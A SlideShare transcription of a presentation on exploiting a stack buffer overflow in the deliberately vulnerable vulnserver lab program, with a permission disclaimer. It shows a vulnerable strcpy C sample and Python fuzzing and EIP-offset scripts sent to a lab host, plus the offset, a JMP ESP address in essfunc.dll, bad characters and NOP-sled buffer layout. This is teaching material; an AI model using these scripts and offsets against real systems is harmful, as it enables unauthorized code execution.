Paul Dutot IEng MIET MBCS CITP OSCP CSTM, profile picture
Uploaded byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
ODP, PPTX3,757 views

Exploiting buffer overflows

This document discusses conducting a buffer overflow attack against a vulnerable program. It describes the stack structure and how overflowing a buffer can overwrite the instruction pointer to redirect execution. Specifically, it shows finding the offset to overwrite the EIP, locating a "JMP ESP" instruction to redirect execution, adding shellcode, and dealing with bad characters. The final buffer structure pushes shellcode onto the stack and redirects to it to execute the attack. However, it notes these attacks should only be tested with explicit permission.

Embed presentation

Download as ODP, PPTX
Disclaimer @cyberkryption The views expressed within this presentation or afterwards are my own and in no way represent my employer. The following presentation describes how to conduct a buffer overflow attack. These attacks are illegal to perform against systems that you do not have explicit permission to test. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Caveat: With knowledge comes responsibility
Who am I @cyberkryption
Who is This?
Von Neuman Explained.. Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec
Phrack 49
Meet the Stack Each program has it's own stack as a memory structure. Program data such as variable are also saved Data is 'pushed' on to the stack and 'popped' off the stack https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
A Vulnerable 'C' program #include<stdio.h> int main(int argc, char *argv[]) { char buff[20]; printf("copying into buffer"); strcpy(buff,argv[1]); return 0; } We defined a character of size 20 bytes, it reserves some space on the stack We copy the buffer using string copy without checking it's size If we pass more then the buffer size (20 bytes) we get a buffer overflow !!!
Stack Overwrite Data on the stack is overwritten. Extra input overwrites other data in the stack Eventually the instruction pointer is overwritten and we have control!!! https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
Meet the CPU Registers & Pointers CPU Pointers EIP = Points to the next address in memory to be executed ESP = Stack Pointer. EBP = Stack Pointer Base Pointer If we can overwrite EIP we can control execution flow other wise it's a DOS exploit. CPU Registers EAX Accumulator EBX Base Register ECX Counter Register EDX Data Register
Meet vulnserver
Initial Fuzzing #!/usr/bin/python import socket server = '192.168.1.65' port = 9999 length = int(raw_input('Length of attack: ')) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending attack length ", length, ' to TRUN .' attack = 'A' * length s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
Initial Fuzzing - Video
Initial Crash - Video
Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer ???????? ???????? ????????
EIP Hunting #!/usr/bin/python import socket server = '192.168.1.65' port = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN ." attack = " < insert cyclic pattern here> " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
EIP Hunting – Cyclic Pattern Crash
How to Locate EIP Overwrite ● After crash with cyclic pattern, we find characters of 396F4348 overwriting the EIP register ● Metasploit pattern_create.rb to create a cyclic pattern of 3000 non repeating characters. ● Lastly use pattern offset to find EIP overwrite ● Use convert.sh for HEX to ASCII conversion
Locating EIP Offset - Video
EIP Hunting Part II #!/usr/bin/python import socket server = '192.168.1.65' sport = 9999 prefix = 'A' * 2006 eip = 'BBBB' padding = 'F' * (3000 - 2006 - 4) attack = prefix + eip + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, sport)) print s.recv(1024) print "Sending Buffer to TRUN " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
EIP & Buffer Space Confirmed Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes
Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction ???????? ????????
Determining JMP ESP Memory Location
Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll ????????
The Bad Character Problem Hex Dec Description --- --- --------------------------------------------- 0x00 0 Null byte, terminates a C string 0x0A 10 Line feed, may terminate a command line 0x0D 13 Carriage return, may terminate a command line 0x20 32 Space, may terminate a command line argument Bad Characters break our code when executed on the stack, for example 0x00 will stop our code executing!!
Determining Bad Characters
Determining Bad Characters
Path to Victory Determine Buffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll 0x00
Lets Create some Shellcode
Final Buffer Structure & Operation 625011AF EIP Overwite'A' * 2006 ShellcodeNOP Sled JMP ESP Buffer Overflow starts here Execution to 625011AF JMP ESP in 625011AF redirects to NOP SLED Shellcode Runs xCC Breakpoint Breakpoint Activated
Putting it all together
CVE2012-5958 /5959
CVE2012-5958 /5959
Questions ???? TWITTER: @cyberkryption BLOG: cyberkryption.wordpress.com

More Related Content

PPTX
04 - I love my OS, he protects me (sometimes, in specific circumstances)
byAlexandre Moneger
 
PPTX
09 - ROP countermeasures, can we fix this?
byAlexandre Moneger
 
PDF
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
bysanghwan ahn
 
PDF
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
bysanghwan ahn
 
PPTX
07 - Bypassing ASLR, or why X^W matters
byAlexandre Moneger
 
PPTX
Exploit Research and Development Megaprimer: Win32 Egghunter
byAjin Abraham
 
PDF
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
bysanghwan ahn
 
PDF
Linux Shellcode disassembling
byHarsh Daftary
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
byAlexandre Moneger
 
09 - ROP countermeasures, can we fix this?
byAlexandre Moneger
 
System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting
bysanghwan ahn
 
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner...
bysanghwan ahn
 
07 - Bypassing ASLR, or why X^W matters
byAlexandre Moneger
 
Exploit Research and Development Megaprimer: Win32 Egghunter
byAjin Abraham
 
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
bysanghwan ahn
 
Linux Shellcode disassembling
byHarsh Daftary
 

What's hot

PPTX
05 - Bypassing DEP, or why ASLR matters
byAlexandre Moneger
 
PDF
Translation Cache Policies for Dynamic Binary Translation
bySaber Ferjani
 
ODP
Design and implementation_of_shellcodes
byAmr Ali
 
PDF
A Stealthy Stealers - Spyware Toolkit and What They Do
bysanghwan ahn
 
PDF
Attack your Trusted Core
byDi Shen
 
PDF
From SEH Overwrite with Egg Hunter to Get a Shell!
byRodolpho Concurde
 
PDF
Zn task - defcon russia 20
byDefconRussia
 
PPTX
Python Programming Essentials - M6 - Code Blocks and Indentation
byP3 InfoTech Solutions Pvt. Ltd.
 
PDF
sponsorAVAST-VB2014
byMartin Hron
 
PPTX
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
byAjin Abraham
 
PDF
Code Vulnerabilities & Attacks
byMarcus Botacin
 
PPTX
Buffer overflow – Smashing The Stack
byTomer Zait
 
PDF
Vm ware fuzzing - defcon russia 20
byDefconRussia
 
PPTX
From front-end to the hardware
byHenri Cavalcante
 
PDF
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
byLinaro
 
ODP
Perl Usage In Security and Penetration testing
byVlatko Kosturjak
 
PDF
Advanced cfg bypass on adobe flash player 18 defcon russia 23
byDefconRussia
 
PDF
ARM Trusted FirmwareのBL31を単体で使う!
byMr. Vengineer
 
PPTX
Raspberry Pi I/O控制與感測器讀取
by艾思程式教育
 
PPTX
Return oriented programming (ROP)
byPipat Methavanitpong
 
05 - Bypassing DEP, or why ASLR matters
byAlexandre Moneger
 
Translation Cache Policies for Dynamic Binary Translation
bySaber Ferjani
 
Design and implementation_of_shellcodes
byAmr Ali
 
A Stealthy Stealers - Spyware Toolkit and What They Do
bysanghwan ahn
 
Attack your Trusted Core
byDi Shen
 
From SEH Overwrite with Egg Hunter to Get a Shell!
byRodolpho Concurde
 
Zn task - defcon russia 20
byDefconRussia
 
Python Programming Essentials - M6 - Code Blocks and Indentation
byP3 InfoTech Solutions Pvt. Ltd.
 
sponsorAVAST-VB2014
byMartin Hron
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
byAjin Abraham
 
Code Vulnerabilities & Attacks
byMarcus Botacin
 
Buffer overflow – Smashing The Stack
byTomer Zait
 
Vm ware fuzzing - defcon russia 20
byDefconRussia
 
From front-end to the hardware
byHenri Cavalcante
 
SFO15-202: Towards Multi-Threaded Tiny Code Generator (TCG) in QEMU
byLinaro
 
Perl Usage In Security and Penetration testing
byVlatko Kosturjak
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
byDefconRussia
 
ARM Trusted FirmwareのBL31を単体で使う!
byMr. Vengineer
 
Raspberry Pi I/O控制與感測器讀取
by艾思程式教育
 
Return oriented programming (ROP)
byPipat Methavanitpong
 

Similar to Exploiting buffer overflows

PDF
Buffer Overflows 101: Some Assembly Required
byKory Kyzar
 
PDF
smash the stack , Menna Essa
byCATReloaded
 
PDF
Exploitation Crash Course
byUTD Computer Security Group
 
PDF
Dive into exploit development
byPayampardaz
 
PDF
Writing simple buffer_overflow_exploits
byD4rk357 a
 
ODP
Exploiting Memory Overflows
byAnkur Tyagi
 
PDF
StackOverflow
bySusam Pal
 
PDF
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
byNETWAYS
 
PDF
The Stack and Buffer Overflows
byUTD Computer Security Group
 
PPTX
Tranning-2
byAli Hussain
 
PPT
Software Exploitation Techniques by Amit Malik
byn|u - The Open Security Community
 
PDF
writing self-modifying code and utilizing advanced assembly techniques
byRussell Sanford
 
PDF
Format String Exploitation
byUTD Computer Security Group
 
PDF
Fuzzing: Finding Your Own Bugs and 0days! 1.0
byRodolpho Concurde
 
PPT
Dau Hoang - Buffer Overflows 8980 for Stu
byQueenNicki1
 
PDF
Computer Security
byAristotelis Kotsomitopoulos
 
PDF
Unix executable buffer overflow
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
PDF
Fuzzing: Finding Your Own Bugs and 0days! at Arab Security Conference
byRodolpho Concurde
 
PPTX
Stack-Based Buffer Overflows
byDaniel Tumser
 
PDF
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
byElvin Gentiles
 
Buffer Overflows 101: Some Assembly Required
byKory Kyzar
 
smash the stack , Menna Essa
byCATReloaded
 
Exploitation Crash Course
byUTD Computer Security Group
 
Dive into exploit development
byPayampardaz
 
Writing simple buffer_overflow_exploits
byD4rk357 a
 
Exploiting Memory Overflows
byAnkur Tyagi
 
StackOverflow
bySusam Pal
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
byNETWAYS
 
The Stack and Buffer Overflows
byUTD Computer Security Group
 
Tranning-2
byAli Hussain
 
Software Exploitation Techniques by Amit Malik
byn|u - The Open Security Community
 
writing self-modifying code and utilizing advanced assembly techniques
byRussell Sanford
 
Format String Exploitation
byUTD Computer Security Group
 
Fuzzing: Finding Your Own Bugs and 0days! 1.0
byRodolpho Concurde
 
Dau Hoang - Buffer Overflows 8980 for Stu
byQueenNicki1
 
Computer Security
byAristotelis Kotsomitopoulos
 
Unix executable buffer overflow
byAmmarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Fuzzing: Finding Your Own Bugs and 0days! at Arab Security Conference
byRodolpho Concurde
 
Stack-Based Buffer Overflows
byDaniel Tumser
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
byElvin Gentiles
 

More from Paul Dutot IEng MIET MBCS CITP OSCP CSTM

PPTX
Welcome to the #WannaCry Wine Club
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PPTX
Scanning Channel Islands Cyberspace
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PPTX
Incident Response in the wake of Dear CEO
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Logicalis Security Conference
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Letter anonymous-II
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Practical Cyber Defense
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
ODP
A Letter from Anonymous to the Jersey Finance Industry
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Infosec lecture-final
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Path to Surfdroid
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
WI-FI Security in Jersey 2011
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Welcome to the #WannaCry Wine Club
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Scanning Channel Islands Cyberspace
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Incident Response in the wake of Dear CEO
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Logicalis Security Conference
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Letter anonymous-II
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Practical Cyber Defense
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
A Letter from Anonymous to the Jersey Finance Industry
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Infosec lecture-final
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Path to Surfdroid
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 
WI-FI Security in Jersey 2011
byPaul Dutot IEng MIET MBCS CITP OSCP CSTM
 

Recently uploaded

PDF
The Emergence of Empathic XR: AWE Asia 2026 keynote
byMark Billinghurst
 
PPTX
Workflow and decision Automation with Flowable
bychakib ch
 
PDF
Writing GPU-Ready AI Models in Pure Java with Babylon
byAna-Maria Mihalceanu
 
PPTX
Working Session — Build a Document Understanding Automation Using an OOTB ML ...
byDianaGray10
 
PDF
How does MES(Manufacturing Execution System) work?
byakipii ogaoga
 
PPTX
TravelTech Paris 2025 | Beyond the pipes: Why Channel Management isn’t really...
byapidays
 
PPTX
Computer architecture, Computer architecture ,Computer architecture
bywaheedqazi123
 
PDF
final.pdf
byomarbishtawi04
 
PDF
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
PDF
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
PDF
How to Prepare for the RWA Tokenization Trend
byrose mason
 
PDF
final~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.pdf
byomarbishtawi04
 
PPTX
Do You Control the AI, or Does the AI Control You?
bymedhateltoukhy
 
PDF
Explaining the flow of purpose-specific BOM
byakipii ogaoga
 
PDF
Poročilo odbora CIS (CH08873) za leto 2025 na letni skupščini IEEE Slovenija ...
byUniversity of Maribor
 
PDF
Python Automation in Action: Real-World Use Cases and Practical Implementation
byDenys Smirnov
 
PDF
Session 1/5: Enhancing Automation with Screenplay & Business Rules
bysuhanisingh58689
 
PPTX
Beyond the Algorithm: Designing Human-Centric Public Service with AI
byAlan Dix
 
PDF
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
PPTX
Tech Trends 2026: AI Agents, Quantum Computing, Robotics & Cybersecurity
byridwansassman
 
The Emergence of Empathic XR: AWE Asia 2026 keynote
byMark Billinghurst
 
Workflow and decision Automation with Flowable
bychakib ch
 
Writing GPU-Ready AI Models in Pure Java with Babylon
byAna-Maria Mihalceanu
 
Working Session — Build a Document Understanding Automation Using an OOTB ML ...
byDianaGray10
 
How does MES(Manufacturing Execution System) work?
byakipii ogaoga
 
TravelTech Paris 2025 | Beyond the pipes: Why Channel Management isn’t really...
byapidays
 
Computer architecture, Computer architecture ,Computer architecture
bywaheedqazi123
 
final.pdf
byomarbishtawi04
 
Safer’s Picks: The 5 FME Transformers You Didn’t Know You Needed
bySafe Software
 
Explaining specific examples of purpose-specific BOM
byakipii ogaoga
 
How to Prepare for the RWA Tokenization Trend
byrose mason
 
final~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.pdf
byomarbishtawi04
 
Do You Control the AI, or Does the AI Control You?
bymedhateltoukhy
 
Explaining the flow of purpose-specific BOM
byakipii ogaoga
 
Poročilo odbora CIS (CH08873) za leto 2025 na letni skupščini IEEE Slovenija ...
byUniversity of Maribor
 
Python Automation in Action: Real-World Use Cases and Practical Implementation
byDenys Smirnov
 
Session 1/5: Enhancing Automation with Screenplay & Business Rules
bysuhanisingh58689
 
Beyond the Algorithm: Designing Human-Centric Public Service with AI
byAlan Dix
 
February 2026 Patch Tuesday hosted by Chris Goettl and Todd Schell
byIvanti
 
Tech Trends 2026: AI Agents, Quantum Computing, Robotics & Cybersecurity
byridwansassman
 

Exploiting buffer overflows

  • 2.
    Disclaimer @cyberkryption The views expressedwithin this presentation or afterwards are my own and in no way represent my employer. The following presentation describes how to conduct a buffer overflow attack. These attacks are illegal to perform against systems that you do not have explicit permission to test. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Caveat: With knowledge comes responsibility
  • 3.
  • 4.
  • 5.
    Von Neuman Explained.. Extractfrom Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec
  • 6.
  • 7.
    Meet the Stack Eachprogram has it's own stack as a memory structure. Program data such as variable are also saved Data is 'pushed' on to the stack and 'popped' off the stack https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  • 8.
    A Vulnerable 'C'program #include<stdio.h> int main(int argc, char *argv[]) { char buff[20]; printf("copying into buffer"); strcpy(buff,argv[1]); return 0; } We defined a character of size 20 bytes, it reserves some space on the stack We copy the buffer using string copy without checking it's size If we pass more then the buffer size (20 bytes) we get a buffer overflow !!!
  • 9.
    Stack Overwrite Data onthe stack is overwritten. Extra input overwrites other data in the stack Eventually the instruction pointer is overwritten and we have control!!! https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  • 10.
    Meet the CPURegisters & Pointers CPU Pointers EIP = Points to the next address in memory to be executed ESP = Stack Pointer. EBP = Stack Pointer Base Pointer If we can overwrite EIP we can control execution flow other wise it's a DOS exploit. CPU Registers EAX Accumulator EBX Base Register ECX Counter Register EDX Data Register
  • 11.
  • 12.
    Initial Fuzzing #!/usr/bin/python import socket server= '192.168.1.65' port = 9999 length = int(raw_input('Length of attack: ')) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending attack length ", length, ' to TRUN .' attack = 'A' * length s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
  • 13.
  • 14.
  • 15.
    Path to Victory DetermineBuffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer ???????? ???????? ????????
  • 16.
    EIP Hunting #!/usr/bin/python import socket server= '192.168.1.65' port = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, port)) print s.recv(1024) print "Sending Evil Buffer to TRUN ." attack = " < insert cyclic pattern here> " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
  • 17.
    EIP Hunting –Cyclic Pattern Crash
  • 18.
    How to LocateEIP Overwrite ● After crash with cyclic pattern, we find characters of 396F4348 overwriting the EIP register ● Metasploit pattern_create.rb to create a cyclic pattern of 3000 non repeating characters. ● Lastly use pattern offset to find EIP overwrite ● Use convert.sh for HEX to ASCII conversion
  • 19.
  • 20.
    EIP Hunting PartII #!/usr/bin/python import socket server = '192.168.1.65' sport = 9999 prefix = 'A' * 2006 eip = 'BBBB' padding = 'F' * (3000 - 2006 - 4) attack = prefix + eip + padding s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, sport)) print s.recv(1024) print "Sending Buffer to TRUN " s.send(('TRUN .' + attack + 'rn')) print s.recv(1024) s.send('EXITrn') print s.recv(1024) s.close()
  • 21.
    EIP & BufferSpace Confirmed Buffer Space = 023AFAEB - 023AF9E0 = 980 Bytes
  • 22.
    Path to Victory DetermineBuffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction ???????? ????????
  • 23.
    Determining JMP ESPMemory Location
  • 24.
    Path to Victory DetermineBuffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 + 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll ????????
  • 25.
    The Bad CharacterProblem Hex Dec Description --- --- --------------------------------------------- 0x00 0 Null byte, terminates a C string 0x0A 10 Line feed, may terminate a command line 0x0D 13 Carriage return, may terminate a command line 0x20 32 Space, may terminate a command line argument Bad Characters break our code when executed on the stack, for example 0x00 will stop our code executing!!
  • 26.
  • 27.
  • 28.
    Path to Victory DetermineBuffer Length. Any Register pointing to buffer? Locate EIP overwrite offset in buffer. Enough space for shellcode? Determine JMP ESP location ? Resolve any bad characters 'A' *3000 / ESP = Buffer 4 Bytes > 2006 980 bytes shellcode EIP Overwite'A' * 2006 Shellcode Buffer Construction 625011AF in essfunc.dll 0x00
  • 29.
  • 30.
    Final Buffer Structure& Operation 625011AF EIP Overwite'A' * 2006 ShellcodeNOP Sled JMP ESP Buffer Overflow starts here Execution to 625011AF JMP ESP in 625011AF redirects to NOP SLED Shellcode Runs xCC Breakpoint Breakpoint Activated
  • 31.
  • 32.
  • 33.
  • 34.